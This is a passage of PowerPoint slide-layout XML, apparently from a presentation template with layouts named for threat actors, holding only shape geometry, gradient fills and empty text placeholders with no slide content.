                <a:cubicBezTo>
                  <a:pt x="6728450" y="439877"/>
                  <a:pt x="6710160" y="837463"/>
                  <a:pt x="6538369" y="1197788"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3833625" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2095073" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5122439" y="520605"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5179012" y="402475"/>
                  <a:pt x="5203969" y="297651"/>
                  <a:pt x="5085837" y="241081"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4969368" y="186175"/>
                  <a:pt x="4902815" y="271029"/>
                  <a:pt x="4846243" y="389163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1756863" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6858000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                  <a:alpha val="50000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="2129" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" indent="0" defTabSz="914400" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3110607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3 Threat Actors">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AC5FA28F-A88F-1CCC-19ED-61043FE1C1BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600075" y="2768830"/>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1" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A206D5-2E96-1BD1-B53B-1876716F7235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4394900" y="2768830"/>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2" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{663F8554-DEAA-5D74-0FE0-E274EE8ED449}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8189725" y="2768830"/>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837895" y="4027208"/>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1" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58AF2FDE-F070-F1E3-E15E-080E466DB4CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412490" y="4013038"/>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2" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43BAF024-D859-505A-31B5-5F26DED17019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4600276" y="4020123"/>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5" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFDC2111-ABB3-44AE-15D3-E57F1C096962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562254" y="355716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29" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AB9E893-2B8B-E4B5-A30F-263C88F20D15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562255" y="311472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36" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AEB67F2-9FB2-B99D-FC95-7231575B90D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372997" y="355716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37" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8A86A9B-0228-54D3-34F8-88BE0A68427A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372998" y="311472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38" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E2748C7-A29B-31DF-B230-BAB13EE74854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9135567" y="355716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39" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B794FC62-DD78-D8E8-B866-B844494A012C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9135568" y="311472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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15658100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4 Threat Actors">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9A53AD7B-0D77-DDCF-0322-9C0C9D3E3543}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2472497" y="1648692"/>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9" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DBBCEDD-8899-BB6C-B800-E0B2B8F3184F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6264595" y="1648692"/>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0" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78962553-8541-F524-46FA-39E838349826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="31"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501579" y="3866773"/>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1" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D89318F6-37DD-ED65-D63D-58807323058C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6264595" y="3866773"/>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2733944" y="2907068"/>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2" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43BAF024-D859-505A-31B5-5F26DED17019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6496325" y="2899983"/>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5" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFDC2111-ABB3-44AE-15D3-E57F1C096962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3458303" y="243702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29" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AB9E893-2B8B-E4B5-A30F-263C88F20D15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3458304" y="199458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36" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AEB67F2-9FB2-B99D-FC95-7231575B90D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269046" y="243702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37" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8A86A9B-0228-54D3-34F8-88BE0A68427A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269047" y="199458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10" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE83DF5B-5E71-9F61-5783-78469E809CC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2733944" y="5125150"/>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11" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5E3B842-0853-1D31-B30A-DE13872E6513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6496325" y="5118065"/>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12" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FABE662B-335E-2E1A-71A0-944E7647635E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3458303" y="4655104"/>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3" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4819AD40-EBC8-9F33-7D58-DAA9581901D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3458304" y="4212669"/>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14" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62600960-2805-C85C-C1ED-EAA52C706F98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269046" y="4655104"/>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5" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C607EE3F-2D58-75FC-F814-F9DF6A9EED20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269047" y="4212669"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23140813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4 Threat Actors Detailed">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A2C98387-99D4-14EF-8AD1-09C8091B14E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601241" y="1804840"/>
            <a:ext cx="2698689" cy="3504646"/>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2" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F8675E-9492-03DE-97BB-E70A1E58288C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="31"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3450311" y="1804839"/>
            <a:ext cx="2698689" cy="3504646"/>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3" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B4EAB81-6B55-5694-0970-7A153883F83C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299381" y="1804838"/>
            <a:ext cx="2698689" cy="3504646"/>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4" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED3163A4-6889-DFFE-6E34-00A8D1677438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="33"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9136544" y="1804837"/>
            <a:ext cx="2698689" cy="3504646"/>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837895" y="3152265"/>
            <a:ext cx="2237310" cy="574918"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="45720" rIns="0" bIns="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5" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFDC2111-ABB3-44AE-15D3-E57F1C096962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485226" y="2634242"/>
            <a:ext cx="1594254"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0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="99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29" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AB9E893-2B8B-E4B5-A30F-263C88F20D15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485900" y="2191808"/>
            <a:ext cx="1573747" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"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
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B41DBFB-882C-BEFA-D4F2-AA9CAD307B77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3705082" y="3152265"/>
            <a:ext cx="2237310" cy="574918"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="45720" rIns="0" bIns="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18" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D84D2C9A-C034-650C-F2C3-6EC8BFB56AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4352413" y="2634242"/>
            <a:ext cx="1594254"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0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="99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9" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8CD30D5-E4F1-5F8C-3C51-571D91F6C4CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4353087" y="2191808"/>
            <a:ext cx="1573747" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"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
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAEB8BA-84CB-9778-CE27-370F2B4D5B6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6544686" y="3152265"/>
            <a:ext cx="2237310" cy="574918"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="45720" rIns="0" bIns="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4" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E1A7F9-F363-60A6-F706-0143B22F6145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7192017" y="2634242"/>
            <a:ext cx="1594254"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0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="99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26" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6128966F-E869-C28A-A2AB-6182F89BA8C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7192691" y="2191808"/>
            <a:ext cx="1573747" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"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
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CB9CE68-C35C-0377-79C5-E983AA9FB612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9373198" y="3152265"/>
            <a:ext cx="2237310" cy="574918"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="45720" rIns="0" bIns="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31" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A71D364-36C1-C3BC-DF07-58025432C5A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10020529" y="2634242"/>
            <a:ext cx="1594254"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0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="99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32" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE6DCB3-5F0C-90F2-B389-5ECD83BB64B3}"/>
              </a:ext>
            </a:extLst>
